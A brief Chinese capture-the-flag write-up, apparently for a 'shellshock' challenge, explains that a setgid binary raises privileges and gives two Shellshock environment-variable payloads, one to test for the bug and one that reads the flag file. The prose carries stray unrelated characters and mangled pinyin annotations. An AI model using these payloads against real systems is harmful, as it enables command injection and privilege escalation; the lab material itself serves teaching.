- 這題考驗(yàn)對(duì)linux的權(quán)限認(rèn)知,首先shellshock程序有特殊sgid權(quán)限昆淡,當(dāng)執(zhí)行shellshock時(shí)锰瘸,當(dāng)前的權(quán)限就會(huì)上升到shellshock_pwn,就會(huì)有查看flag的權(quán)限了昂灵,然后利用shellshock(破殼)漏洞來(lái)任意bash命令執(zhí)行cat flag
- 測(cè)試有無(wú)破殼漏洞
env x='() { :;}; echo vulnerable' ./bash -c "test"
- cat flag
env x='() { :;}; /bin/cat flag' ./shellshock